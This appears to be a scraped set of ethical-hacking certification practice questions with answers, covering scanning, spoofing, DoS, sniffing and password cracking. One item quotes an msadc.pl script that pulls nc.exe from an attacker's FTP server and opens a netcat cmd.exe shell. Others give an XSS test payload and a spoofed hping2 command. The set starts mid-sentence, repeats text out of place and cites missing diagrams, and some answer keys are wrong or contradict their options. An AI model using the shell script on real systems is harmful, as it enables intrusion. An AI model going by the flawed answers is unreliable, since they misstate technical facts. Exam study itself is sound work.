Specifically, pretexting. Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone.
Which of the following activities would not be considered passive footprinting?
A. Perform multiple queries through a search engine
B. Search on financial site such as Yahoo Financial
C. Scan the range of IP address found in their DNS database
D. Go through the rubbish to find out any information that might have been discarded
C. Scan the range of IP addresses found in their DNS database.

Passive footprinting is a method in which the attacker never makes contact with the target. Scanning the targets IP addresses can be logged at the target and therefore contact has been made.
An nmap command that includes the host specification of 202.176.56-57.* will scan _______
number of hosts.

A. 512
B. 256
C. 2
D. Over 10,000
A. The hosts with IP address 202.176.56.0-255 & 202.176.56.0-255 will be scanned (256+256=512)
What type of attack is shown in the above diagram?

A. Man-in-the-Middle (MiTM) Attack
B. Session Hijacking Attack
C. SSL Spoofing Attack
D. Identity Stealing Attack
A. Man-in-the-Middle (MiTM) attack
Bob has a good understanding of cryptography, having worked with it for many years.
Cryptography is used to secure data from specific threats, but it does not secure the application from coding errors. It can provide data privacy; integrity and enable strong authentication but it
cannot mitigate programming errors. What is a good example of a programming error that Bob can use to explain to the management how encryption will not address all their security concerns?
A. Bob can explain that using passwords to derive cryptographic keys is a form of a programming error
B. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique
C. Bob can explain that a random number generator can be used to derive cryptographic keys but
it uses a weak seed value and this is a form of a programming error
D. Bob can explain that using a weak key management technique is a form of programming error
B. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique.

A buffer overflow occurs when you write a set of values (usually a string of characters) into a fixed
length buffer and write at least one value outside that buffer's boundaries (usually past its end). A
buffer overflow can occur when reading input from the user into a buffer, but it can also occur
during other kinds of processing in a program. Technically, a buffer overflow is a problem with the program's internal implementation
You want to know whether a packet filter is in front of 192.168.1.10. Pings to 192.168.1.10 don't
get answered. A basic nmap scan of 192.168.1.10 seems to hang without returning any
information.
What should you do next?

A. Run NULL TCP hping2 against 192.168.1.10
B. The firewall is blocking all the scans to 192.168.1.10
C. Use NetScan Tools Pro to conduct the scan
D. Run nmap XMAS scan against 192.168.1.10
A. Run NULL TCP hping2 against 192.168.1.10
An attacker is attempting to telnet into a corporation's system in the DMZ. The attacker doesn't
want to get caught and is spoofing his IP address. After numerous tries he remains unsuccessful
in connecting to the system. The attacker rechecks that the target system is actually listening on
Port 23 and he verifies it with both nmap and hping2. He is still unable to connect to the target
system. What could be the reason?
A. He is attacking an operating system that does not reply to telnet even when open
B. He needs to use an automated tool to telnet in
C. He cannot spoof his IP and successfully use TCP
D. The firewall is blocking port 23 to that system
C. He cannot spoof his IP and successfully use TCP

Spoofing your IP will only work if you don't need to get an answer from the target system. In this
case the answer (login prompt) from the telnet session will be sent to the "real" location of the IP
address that you are showing as the connection initiator.
Attacker forges a TCP/IP packet, which causes the victim to try opening a connection with itself.
This causes the system to go into an infinite loop trying to resolve this unexpected connection.
Eventually, the connection times out, but during this resolution, the machine appears to hang or
become very slow. The attacker sends such packets on a regular basis to slow down the system.
Unpatched Windows XP and Windows Server 2003 machines are vulnerable to these attacks.
What type of Denial of Service attack is represented here?

A. SMURF Attacks
B. LAND attacks
C. Targa attacks
D. SYN Flood attacks
B. LAND attacks
While testing web applications, you attempt to insert the following test script into the search area
on the company's web site:
<script>alert('Testing Testing Testing')</script>
Afterwards, when you press the search button, a pop up box appears on your screen with the text
"Testing Testing Testing". What vulnerability is detected in the web application here?

A. A buffer overflow
B. Password attacks
C. A hybrid attack
D. Cross Site Scripting
D. Cross-site scripting

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.
Study the snort rule given below and interpret the rule.
alert tcp any any --> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msg: "mountd access";)
A. An alert is generated when a TCP packet originating from any IP address is seen on the
network and destined for any IP address on the 192.168.1.0 subnet on port 111
B. An alert is generated when a TCP packet is generated from any IP on the 192.168.1.0 subnet and destined to any IP on port 111
C. An alert is generated when any packet other than a TCP packet is seen on the network and destined for the 192.168.1.0 subnet
D. An alert is generated when a TCP packet is originated from port 111 of any IP address to the
192.168.1.0 subnet
A. An alert is generated when a TCP packet originating from any IP address is seen on the
network and destined for any IP address on the 192.168.1.0 subnet on port 111
Eric has discovered a fantastic package of tools named Dsniff on the Internet. He has learned how to use these tools in his lab and is now ready for real world exploitation. He was able to effectively intercept communications between two entities and establish credentials with both sides of the connections. The two remote ends of the communication never notice that Eric was relaying the information between the two. What would you call this attack?

A. Man-in-the-middle
B. Interceptor
C. Poisoning Attack
D. Arp Proxy
A. Man-in-the-middle

A man-in-the-middle attack ( MITM ) is an attack in which an attacker is able to read, insert and modify at will, messages between two parties without either party knowing that the link between them has been compromised
You have been using the msadc.pl attack script to execute arbitrary commands on an NT4 web
server. While it is effective, you find it tedious to perform extended functions. On further research
you come across a perl script that runs the following msadc functions:
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
$o=<STDIN>; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
What kind of exploit is indicated by this script?

A. A buffer overflowexploit
B. A SUID exploit
C. A chained exploit
D. A SQL injectionexploit
E. A buffer under runexploit
C. A chained exploit
Sabotage, Advertising and Covering are the three stages of _____

A. Reverse Software Engineering
B. Social engineering
C. Reverse Social Engineering
D. Rapid Development Engineering
C. Reverse Social Engineering

Typical social interaction dictates that if someone gives us something then it is only right for us to return the favour. This is known as reverse social engineering, when an attacker sets up a situation where the victim encounters a problem, they ask the attacker for help and once the problem is solved the victim then feels obliged to give the information requested by the attacker.
You are conducting an IdleScan manually using Hping2. During the scanning process, you notice that almost every query increments the IPID - regardless of the port being queried. One or two of the queries cause the IPID to increment by more than one value. Which of the following options would be a possible reason?

A. Hping2 cannot be used for idlescanning
B. The zombie you are using is not truly idle
C. These ports are actually open on the target system
D. A stateful inspection firewall is resetting your queries
B. The zombie you are using is not truly idle

If the IPID is incremented by more than the normal increment for this type of system it means that the system is interacting with some other system beside yours and has sent packets to an unknown host between the packets destined for you.
While performing ping scans into a target network you get a frantic call from the organization's security team. They report that they are under a denial of service attack. When you stop your scan, the smurf attack event stops showing up on the organization's IDS monitors. How can you modify your scan to prevent triggering this event in the IDS?

A. Only scan the Windows systems
B. Scan more slowly
C. Spoof the source IP address
D. Do not scan the broadcast IP
D. Do not scan the broadcast IP

Scanning the broadcast address makes the scan target all IP addresses on that subnet at the same time
While doing a penetration test, you discover that the organization is using one domain for web publishing and another domain for administration and business operations. During what phase of the penetration test would you normally discover this?

A. Active Attack
B. Port Scanning
C. Vulnerability Mapping
D. Passive Information Gathering
D. Passive information gathering.
Harold is the senior security analyst for a small state agency in New York.He has no other security
professionals that work under him, so he has to do all the security-related tasks for the
agency.Coming from a computer hardware background, Harold does not have a lot of experience
with security methodologies and technologies, but he was the only one who applied for the position.
Harold is currently trying to run a Sniffer on the agency's network to get an idea of what kind of traffic is being passed around, but the program he is using does not seem to be capturing anything. He pores through the Sniffer's manual, but cannot find anything that directly relates to his problem. Harold decides to ask the network administrator if he has any thoughts on the
problem.Harold is told that the Sniffer was not working because the agency's network is a switched network, which cannot be sniffed by some programs without some tweaking.
What technique could Harold use to sniff his agency's switched network?

A. Conduct MiTM against the switch
B. Launch smurf attack against the switch
C. ARP spoof the default gateway
D. Flood the switch with ICMP packets
C. ARP spoof the default gateway.

ARP spoofing, also known as ARP poisoning, is a technique used to attack an Ethernet network which may allow an attacker to sniff data frames on a local area network (LAN) or stop the traffic altogether (known as a denial of service attack). The principle of ARP spoofing is to send fake, or 'spoofed', ARP messages to an Ethernet LAN. These frames contain false MAC addresses, confusing network devices, such as network switches. As a result frames intended for one machine can be mistakenly sent to another (allowing the packets to be sniffed) or an unreachable host (a denial of service attack).
The terrorist organizations are increasingly blocking all traffic from North America or from Internet Protocol addresses that point back to users who rely on the English language.
Hackers sometimes set a number of criteria for accessing their website. This information is shared among the co-hackers. For example if you are using a machine with the Linux operating system
and the Netscape browser then you will have access to their website in a covert way. When federal investigators using PCs running Windows and using Internet Explorer visited the hackers' shared site, the hackers' system immediately mounted a distributed denial-of-service attack against the federal system.
Companies today are engaging in tracking competitors' through reverse IP address lookup sites
like whois.com, which provide an IP address's domain. When the competitor visits the company's website they are directed to a products page without discount and prices are marked higher for
their product. When normal users visit the website they are directed to a page with full-blown product details along with attractive discounts. This is based on IP-based blocking, where certain
addresses are barred from accessing a site.
What is this masking technique called?

A. Website Filtering
B. IP Access Blockade
C. Mirroring Website
D. Website Cloaking
D. Website Cloaking

Website Cloaking travels under a variety of alias including Stealth, Stealth scripts, IP delivery,
Food Script, and Phantom page technology. It's hot- due to its ability to manipulate those elusive top-ranking results from spider search engines.
You have retrieved the raw hash values from a Windows 2000 Domain Controller. Using social engineering, you know that they are enforcing strong passwords. You understand that all users are required to use passwords that are at least 8 characters in length. All passwords must also use 3 of the 4 following categories: lower case letters, capital letters, numbers and special characters. With your given knowledge of users, likely user account names and the possibility that they will choose the easiest passwords possible, what would be the fastest type of password cracking attack you can run against these hash values to get results?

A. Dictionary Attack
B. Hybrid Attack
C. Brute Force Attack
D. Encryption Attack
B. Hybrid Attack

A dictionary attack will not work as strong passwords are enforced, also the minimum length of 8 characters in the password makes a brute force attack time consuming. A hybrid attack where you take a word from a dictionary and exchange a number of letters with numbers and special characters will probably be the fastest way to crack the passwords.
Harold works for Jacobson Unlimited in the IT department as the security manager. Harold has created a security policy requiring all employees to use complex 14 character passwords.
Unfortunately, the members of management do not want to have to use such long complicated passwords so they tell Harold's boss this new password policy should not apply to them. To
comply with management's wishes, the IT department creates another Windows domain and moves all the management users to that domain. This new domain has a password policy only requiring 8 characters.
Harold is concerned about having to accommodate the managers, but cannot do anything about it.
Harold is also concerned about using LanManager security on his network instead of NTLM or NTLMv2, but the many legacy applications on the network prevent using the more secure NTLM and NTLMv2. Harold pulls the SAM files from the DC's on the original domain and the new domain using Pwdump6.
Harold uses the password cracking software John the Ripper to crack users' passwords to make sure they are strong enough. Harold expects that the users' passwords in the original domain will take much longer to crack than management's passwords in the new domain. After running the software, Harold discovers that the 14 character passwords only took a short time longer to crack than the 8 character passwords.
Why did the 14 character passwords not take much longer to crack than the 8 character passwords?

A. Harold should have used Dumpsec instead of Pwdump6
B. LanManger hashes are broken up into two 7 character fields
C. Harold should use LC4 instead of John the Ripper
D. Harold's dictionary file was not large enough
B. LanManager hashes are broken into two 7 character fields.
Hping2 is a powerful packet crafter tool that can be used to penetrate firewalls by creating custom TCP
What does the following command do?
CEH# hping2 -I eth0 -a10.0.0.6 -s 1037 -p 22 --syn -c 1 -d 0xF00 --setseq 0x0000000f 192.168.0.9

A. This command will generate a single TCP UDP packet with source port 1037, destination port
15, with a sequence number 22 spoofing the IP address 192.168.0.9
B. This command will generate a multiple TCP SYN/ACK packets with source port 22, destination
port 1037, with a sequence number 19 spoofing the IP address 192.168.0.9
C. This command will generate multiple TCP SYN packets with source port 1037, destination port
22, with a sequence number 15 spoofing the IP address 10.0.0.6
D. This command will generate a single TCP SYN packet with source port 1037, destination port
22, with a sequence number 15 spoofing the IP address 10.0.0.6
D. This command will generate a single TCP SYN packet with source port 1037, destination port 22, with a sequence number 15 spoofing the IP address 10.0.0.6
The programmers on your team are analyzing the free, open source software being used to run FTP services on a server in your organization. They notice that there is excessive number of functions in the source code that might lead to buffer overflow. These C++ functions do not check bounds. Identify the line in the source code that might lead to buffer overflow?

A. 20
B. 9
C. 32
D. 35
E. 15
E. 15
You are attempting to map out the firewall policy for an organization. You discover your target system is one hop beyond the firewall. Using hping2, you send SYN packets with the exact TTL of the target system starting at port 1 and going up to port 1024. What is this process known as?

A. Firewalking
B. Idle scanning
C. Footprinting
D. Enumeration
A. Firewalking

Firewalking uses a traceroute-like IP packet analysis to determine whether or not a particular packet can pass from the attacker's host to a destination host through a packet-filtering device. This technique can be used to map 'open' or 'pass through' ports on a gateway. Moreover, it can determine whether packets with various control information can pass thorugh a given gateway.
Bob waits near a secured door, holding a box. He waits until an employee walks up to the secured
door and uses the special card in order to access the restricted area of the target company. Just
as the employee opens the door, Bob walks up to the employee (still holding the box) and asks the
employee to hold the door open so that he can enter. What is the best way to undermine the social
engineering activity of tailgating?

A. Post a sign that states, "no tailgating" next to the special card reader adjacent to the secured
door
B. Issue special cards to access secured doors at the company and provide a one-time only brief
description of use of the special card
C. Setup a mock video camera next to the special card reader adjacent to the secured door
D. Educate all of the employees of the company on best security practices on a regular, recurring
basis
D. Educate all of the employees of the company on best security practices on a regular, recurring basis.
Which of the following display filters will you enable in Ethereal to view the three-way handshake for a connection from host 192.168.0.1?

A. ip.equals 192.168.0.1 and syn.equals on
B. ip.addr==192.168.0.1 and tcp.flags.syn
C. ip.addr = 192.168.0.1 and syn = 1
D. ip == 192.168.0.1 and tcp.syn
B. ip.addr==192.168.0.1 and syn.equals on
You are scanning the target network for the first time. You are able to detect few conventional open ports. While attempting to perform conventional service identification by connecting to the open ports, the scan yields either bad or no results. As you are unsure of the protocols in use, you want to discover as many different protocols as possible. Which of the following scan options can help you achieve this?

A. Nmap scan with the P (Ping scan) switch
B. Nmap with the O (Raw IP packets) switch
C. Nessus scan with TCP based pings
D. Netcatscan with the switches
B. Nmap with the O (Raw IP packets) switch.

-sO IP protocol scans: This method is used to determine which IP protocols are supported on a host. The technique is to send raw IP packets without any further protocol header to each specified protocol on the target machine. If we receive an ICMP protocol unreachable message, then the protocol is not in use. Otherwise, we assume it's open. Note that some hosts (AIX, HP-UX, Digital UNIX) and firewalls may not send protocol unreachable messages.
You are footprinting the www.xsecurity.com domain using the Google search engine. You would
like to determine what sites link to www.xsecurity.com at the first level of relevance.
Which of the following operator in Google search will you use to achieve this?

A. link:www.xsecurity.com
B. search?l:www.xsecurity.com
C. pagerank:www.xsecurity.com
D. level1:www.xsecurity.com
A. link:www.xsecurity.com

The query [link:] will list webpages that have links to the specified webpage. For instance, [link
:www.google.com ] will list webpages that have links pointing to the Google homepage. Note there
can be no space between the "link:" and the web page url .
The United Kingdom (UK) has passed a law that makes hacking into an unauthorized network a felony. Section 1 of the Act refers to unauthorized access to computer material. This states that a person
commits an offence if he causes a computer to perform any function with intent to secure
unauthorized access to any program or data held in any computer. For a successful conviction
under this part of the Act, the prosecution must prove that the access secured is unauthorized and
that the suspect knew that this was the case. This section is designed to deal with common-orgarden
hacking.
Section 2 of the Act deals with unauthorized access with intent to commit or facilitate the
commission of further offences. An offence is committed under Section 2 if a Section 1 offence
has been committed and there is the intention of committing or facilitating a further offence (any
offence which attracts a custodial sentence of more than five years, not necessarily one covered
by the Act). Even if it is not possible to prove the intent to commit the further offence, the Section 1
offence is still committed.
Section 3 offences cover unauthorized modification of computer material, which generally means
the creation and distribution of viruses. For a conviction to succeed there must have been the
intent to cause the modification, and knowledge that the modification had not been authorized.
What is this law called?

A. Cyber Crime Law Act 2003
B. Computer Incident Act 2000
C. Computer Misuse Act 1990
D. Cyber Space Crime Act 1995
C. Computer Misuse Act 1990.

The Computer Misuse Act (1990) creates three criminal offenses: Unauthorized access to computer material; Unauthorized access to a computer system with intent to commit or facilitate the commission of a further offense; Unauthorized modification of computer material.
While scanning a network you observe that all of the web servers in the DMZ are responding to ACK packets on port 80. What can you infer from this observation?

A. They are using UNIX based web servers
B. They are using Windows based web servers
C. They are not using an Intrusion Detection System
D. They are not using a stateful inspection firewall
D. They are not using a stateful inspection firewall.

If they used a stateful inspection firewall, this firewall would know if there had been a SYN-ACK before the ACK.
Clive is conducting a pen-test and has just port scanned a system on the network. He has
identified the operating system as Linux and been able to elicit responses from ports 23, 25 and
53. He infers port 23 as running Telnet service, port 25 as running SMTP service and port 53 as
running DNS service. The client confirms these findings and attests to the current availability of the
services. When he tries to telnet to port 23 or 25, he gets a blank screen in response. On typing
other commands, he sees only blank spaces or underscores symbols on the screen. What are you
most likely to infer from this?

A. There is a honeypot running on the scanned machine
B. This indicates that the telnet and SMTP server have crashed
C. An attacker has replaced the services with trojaned ones
D. The services are protected by TCP wrappers
D. The services are protected by TCP wrappers.

:TCP Wrapper is a host-based ACL system used to filter network access to Internet protocol services run on (Unix-like) OS's such as Linux or BSD. It allows host or subnetwork IP addresses, names and or ident query replies, to be used as tokens on which to filter for access control purposes.
How does a denial-of-service attack work?

A. A hacker uses every character, word, or letter he or she can think of to defeat authentication
B. A hacker prevents a legitimate user (or group of users) from accessing a service
C. A hacker tries to decipher a password by using a system, which subsequently crashes the network
D. A hacker attempts to imitate a legitimate user by confusing a computer or even another person
B. A hacker prevents a legitimate user or group of users from accessing a service.

In computer security a DOS is an attempt to make a computer resource unavailable to its intended users. Typically the targets are high-profile web servers, and the attack attempts to make the hosted web pages unavailable on the Internet. It is a computer crime that violates the Internet proper use policy as indicated by the Internet Architecture Board (IAB)
A digital signature is simply a message that is encrypted with the public key instead of the private key.
A. True
B. False
B. False. Digital signatures enable the recipient of information to verify the authenticity of the information's origin, and also verify that the information is intact. Thus, public key digital signatures provide authentication and data integrity. A digital signature also provides non-repudiation. Instead of encrypting information using someone else's public key, you encrypt it with your private key. If the information can be decrypted with your public key, then it must have originated with you.
John is the network administrator for Frederickson Machinery in Tampa, Florida. Frederickson Machinery has one large office, and a number of smaller offices spread out around the city. John's
primary responsibility is to oversee the network equipment hat includes switches, routers, gateways and firewalls. John is the only employee allowed to make any changes or troubleshoot
the network equipment so he has to run to any of the offices himself whenever there are any
network issues. John is becoming more and more busy, so he wants to be able to remotely manage the network equipment as much as possible. He does not want to use telnet because of
its inherent security flaws, so he decides to use SSH. John downloads a program from the Internet for SSH connections and attempts to connect to one of his routers at another office. After a short time, the following screen pops up on his computer:
Why was John not able to connect?

A. He needs to turn off stateful inspection on his firewalls
B. He needs to open port 24 on his firewalls
C. He needs to open port 22 on his firewalls
D. Putty cannot make SSH connections
C. He needs to open port 22 on his firewalls.
Snort is an open source Intrusion Detection System. However, it can also be used for a few other
purposes such as a sniffer. Which of the choices below are the proper features offered by Snort?
A. IDS, Packet Logger, Sniffer
B. IDS, Sniffer, content inspector
C. IDS, Sniffer, Proxy
D. IDS, Firewall, Sniffer
A. IDS, Packet Logger, Sniffer

Snort is a free software NIDS and NIPS capable of performing packet logging and real-time traffic analysis on IP networks. Snort was written by Martin Roesch, but is now owned and developed by Sourcefire.
John wants to try a new hacking tool on his Linux system. As the application comes from a site in his untrusted zone, John wants to ensure that the downloaded tool has not been Trojaned. Which of the following options would indicate the best course of action for John?

A. Compare the file's virus signature with the one published on the distribution media
B. Compare the file's MD5 signature with the one published on the distribution media
C. Obtain the application via SSL
D. Obtain the application from a CD-ROM disc
B. Compare the file's MD5 signature with the one published on the distribution media.

MD5 takes as input a message of arbitrary length and produces as output a 128-bit "fingerprint" or message digest of the input. It is conjectured that it is computationally infeasible to produce two messages having the same message digest, or to produce any message havin ga given prespecified target message digest. The MD5 algorithm is intended for digital signature applications, where a large file must be compressed in a secure manner before being encrypted with a private (secret) key under a public-key cryptosystem such as RSA. In essence, MD5 is a way to verify data integrity and is much more reliable than checksum and many other commonly used methods.
An attacker has successfully compromised a remote computer. Which of the following comes as
one of the last steps that should be taken to ensure that the compromise cannot be traced back to
the source of the problem?

A. Install patches
B. Setup a backdoor
C. Install a zombie for DDOS
D. Cover your tracks
D. Cover your tracks.
John is using a special tool on his Linux platform that has a database containing signatures to be
able to detect hundreds of vulnerabilities in UNIX, Windows, and commonly used web CGI scripts.
Moreover, the database detects DDoS zombies and Trojans as well. What would be the name of this tool?

A. hping2
B. nessus
C. make
D. nmap
B. nessus.

Nessus is the world's most popular vulnerability scanner. Nmap is used only for scanning, not detecting vulnerabilities. Hping is a free packet generator and analyzer for the TCP/IP protocol. Make is used to automatically build large applications on the *nix platform.
You have captured some packets in Ethereal. You want to view only packets sent from 10.0.0.22.
What filter will you apply?

A. ip = 10.0.0.22
B. ip.equals 10.0.0.22
C. ip.address = 10.0.0.22
D. ip.src == 10.0.0.22
D. ip.src == 10.0.0.22

ip.src tells the filter to only show packets with 10.0.0.22 as the source.
Eve decides to get her hands dirty and tries out a Denial of Service attack that is relatively new to her. This time she envisages using a different kind of method to attack Brownies Inc. Eve tries to forge the packets and uses the broadcast address. She launches an attack similar to that of "fraggle". What is the technique that Eve used in the case above?

A. Ping of Death
B. Smurf
C. SYN Flood
D. Bubonic
B. Smurf. A fraggle attack is a variation on the Smurf attack for DOS in which the attacker sends spoofed UDP packets instead of ICMP echo reply (ping) packets to the broadcast address of a large network.
When referring to the Domain Name Service, what is a 'zone'?
A. It is a collection of domains
B. It is the first resource record type in the SOA
C. It is the first domain that belong to a company
D. It is a collection of resource records
D. It is a collection of resource records.

A reasonable definition of a zone would be a portion of the DNS namespace where responsibility has been delegated.
James is the lone IT technician for a small advertising agency in the Midwest. He oversees three
servers and fifteen workstations all running Windows operating systems. James just got back from
a Hacker Halted conference and is now very concerned about the security of his network.
Previously he thought that no one would be interested in his small company's data, but now he thinks otherwise. His budget is very limited and he cannot afford any kind of commercial IDS or IPS system.
James is looking for a freeware or easy-to-use open source program that will help him to detect port scans on his workstations and servers.
What should James use?

A. GFI LANGuard
B. Snort
C. Nmap
D. Genius
B. Snort.
What is the most common vehicle for social engineering attacks?
A. Direct in person
B. Peer to Peer networks
C. Local Area Networks
D. Email
A. Direct in person
Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target
to release information or perform an action and is usually done over the telephone.
Buffer X in an Accounting application module for Brownies Inc. can contain 200 characters. The programmer makes an assumption that 200 characters are more than enough. Because there
were no proper boundary checks being conducted, Bob decided to insert 400 characters into the
200-character buffer. (Overflows the buffer). Below is the code snippet:

Void func (void)
{
int I; char buffer [200];
for (I=0; I<400; I++)
buffer [I]= 'A';
return;
}

How can you protect/fix the problem of your application as shown above?
A. Because the counter starts with 0, we would stop when the counter is more than 200
B. Add a separate statement to signify that if we have written 200 characters to the buffer, the
stack should stop because it cannot hold any more data
C. Add a separate statement to signify that if we have written less than 200 characters to the
buffer, the stack should stop because it cannot hold any more data
D. Because the counter starts with 0, we would stop when the counter is less than 200
B, D

I-199 would be the character number 200. The stack holdes exactly 200 characters so there is no need to stop before 200.
SSL has been seen as the solution to a lot of common security problems. Administrator will often
time make use of SSL to encrypt communications from points A to point B. Why do you think this
could be a bad idea if there is an Intrusion Detection System deployed to monitor the traffic
between point A and B?

A. SSL will slow down the IDS while it is breaking the encryption to see the packet content
B. SSL is redundant if you already have IDS's in place
C. SSL will mask the content of the packet and Intrusion Detection System are blinded
D. SSL will trigger rules at regular interval and force the administrator to turn them off
C. SSL will mask the content of the packet and IDS's are blinded.

An IDS will not be able to evaluate the content in teh packets if it is encrypted.
Jacob would like your advice on using a wireless hacking tool that can save him time and get him
better results with lesser packets. You would like to recommend a tool that uses KoreK's
implementation. Which tool would you recommend from the list below?

A. Aircrack
B. Kismet
C. John the Ripper
D. Shmoo
A. Aircrack.

Aircrack network software suite consists of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs.

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.



Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, decloaking) hidden networks, and infering the presence of nonbeaconing networks via data traffic.

John the Ripper is a free password cracking software tool. Initially developed for the UNIX operating system, it currently runs on fifteen different platforms (11 architecture-specific flavors of Unix, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing/breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker.

Shmoo is an organization (AirSnort, Rainbow Tables, etc. are some of Shmoo's "brainchildren")
Bob is acknowledged as a hacker of repute and is popular among visitors of 'underground' sites.
Bob is willing to share his knowledge to those who are willing to learn, and many have expressed
their interest in learning from him.
However, this knowledge has risks associated with it, as the same knowledge can be used for
malevolent attacks as well. In this context, what would be the most effective method to bridge the
knowledge gap between the "black" hats or crackers and the "white" hats or computer security
professionals?

A. Hire more computer security monitoring personnel to monitor computer systems and networks
B. Make obtaining either a computer security certification or accreditation easier to achieve so
more individualsfeel that they are a part of something larger than life
C. Train more national guard and reservist in the art of computer security to help out in times of
emergency or crises
D. Educate everyone with books, articles and training on risk analysis, vulnerabilities and safeguards
D. Educate everyone with books, articles and training on risk analysis, vulnerabilities and safeguards.

Bridging the gap would consist of educating the white hats and the black hats equally so that their
knowledge is relatively the same. Using books, articles, the internet, and professional training seminars is a way of completing this goal.
Clive has been monitoring his IDS and sees that there are a huge number of ICMP Echo Reply packets that are being received on the external gateway interface. Further inspection reveals they
are not responses from internal hosts' requests but simply responses coming from the Internet.
What could be the likely cause of this?

A. Someone spoofed Clive's IP address while doing a smurf attack
B. Someone spoofed Clive's IP address while doing a land attack
C. Someone spoofed Clive's IP address while doing a DoS attack
D. Someone spoofed Clive's IP address while doing a fraggle attack
A. Someone spoofed Clive's IP address while doing a smurf attack

The smurf attack, named after its exploit program, is a denial-of-service attack that uses spoofed broadcast ping messages to flood a target system. In such an attack, a perpetrator sends a large amount of ICMP echo (ping) traffic to IP broadcast addresses, all of it having a spoofed source address of the intended victim. If the routing device delivering traffic to those broadcast addresses performs the IP broadcast to layer 2 broadcast function, most hosts on that IP network will take the ICMP echo request and reply to it with an echo reply, multiplying the traffic by the number of hosts responding. On a multi-access broadcast network, hundreds of machines might reply to each packet.
_____ is found in all versions of NTFS and is described as the ability to fork file data into existing
files without affecting their functionality, size, or display to traditional file browsing utilities like dir or
Windows Explorer

A. Merge Streams
B. Steganography
C. Alternate Data Streams
D. NetBIOS vulnerability
C. Alternate Data Streams

ADS (or Alternate Data Streams) is a "feature" in the NTFS file system that makes it possible to hide information in alternate data streams in existing files. The file can have multiple data streams
and the data streams are accessed by filename :stream .
Wardialing is one of the oldest methods of gaining unauthorized access to the targeted systems, it
is one of the dangers most commonly forgotten by network engineers and system administrators.
A hacker can sneak past all the expensive firewalls and IDS and connect easily into the network.
Through wardialing, an attacker searches for the devices located in the target network
infrastructure that are also accessible through the telephone line.
'Dial backup' in routers is most frequently found in networks where redundancy is required. Dial-on-demand routing (DDR) is commonly used to establish connectivity as a backup.
As a security tester, how would you discover what telephone numbers to dial-in to the router?

A. Run a war-dialing tool with range of phone numbers and look for CONNECT response
B. Connect using ISP's remote-dial in number since the company's router has a leased line connection established with them
C. Search the Internet for leakage oftarget company's telephone number to dial-in
D. Brute force the company's PABX system to retrieve the range of telephone numbers to dial-in
A. Run a war dialing tool iwht range of phone numbers and look for CONNECT response. Programs like TONELOC allow you scan a range of phone numbers.
Jim was having no luck performing a penetration test on his company's network. He was running
the test from home and had downloaded every security scanner he could lay his hands on.
Despite knowing the IP range of all of the systems, and the exact network configuration, Jim was
unable to get any useful results. Why is Jim having these problems?

A. Security scanners are not designed to do testing through a firewall
B. Security scanners cannot perform vulnerability linkage
C. Security scanners are only as smart as their database and cannot find unpublished
vulnerabilities
D. All of the above
D. All of the above.

The Security scanners available online are often too "outdated" to perform a live pentest against a
victim.
You are concerned that someone running PortSentry could block your scans, and you decide to
slow your scans so that no one detects them. Which of the following command will help you
achieve this?
A. nmap -sO -PT -O -C5 <ip address>
B. nmap -sF -PT -PI -O <ip address>
C. nmap -sS -PT -PI -O -T1 <ip address>
D. nmap -sF -P0 -O <ip address>
C. nmap -sS -PT -PI -O -T1 <ip address>

- T[ 0-5]:Settimingtemplate(higherisfaster)
Why would an attacker want to perform a scan on port 137?
A. To disrupt the NetBIOS SMB service on the target host
B. To discover proxy servers on a network
C. To check for file and print sharing on Windows systems
D. To discover information about a target host using NBTSTAT
D. To discover information about a target host using NBTSTAT.

Microsoft encapsulates netbios information within TCP/IP using ports 135-139. It is trivial for an attacker to issue the following command:

nbtstat -A (yourIPaddresshere)

from their Windows machine and collect information about your Windows machine (if you are not blocking traffic to port 137 at your borders.)
On a backdoored Linux box there is a possibility that legitimate programs are modified or trojaned.
How is it possible to list processes and uids associated with them in a more reliable manner?

A. Use "ps"
B. Use "netstat"
C. Use "lsof"
D. Use "echo"
C. Use "lsof"

lsof is a command used in many Unix-like systems that is used to report a list of all open files and the processes that opened them. It works in and supports several UNIX flavors.
You are the IT manager of a large legal firm in California. Your firm represents many important
clients whose names always must remain anonymous to the public. Your boss, Mr. Smith, is
always concerned about client information being leaked or revealed to the press or public. You
have just finished a complete security overhaul of your information systems including an updated
IPS, new firewalls, email encryption, and employee security awareness training. Unfortunately,
many of your firm's clients do not trust technology to completely secure their information, so
couriers routinely have to travel back and forth, to and from the office with sensitive information. Your boss has charged you with figuring out how to secure the information the couriers must
transport. You propose that the data be transferred using burned CD's or USB flash drives. You
initially think of encrypting the files, but decide against that method for fear the encryption keys could eventually be broken?
What software application could you use to hide the data on the CD's and USB flash drives?

A. File snuff
B. Snow
C. EFS
D. File sneaker
B. Snow.

Snow software will insert extra spaces at the end of each line. Three bits are encoded in each line by adding between 0 and 7 spaces that are ignored by most display programs, including web browsers.
SNMP is a connectionless protocol that uses UDP instead of TCP packets (True or False)

A. True
B. False
A. True

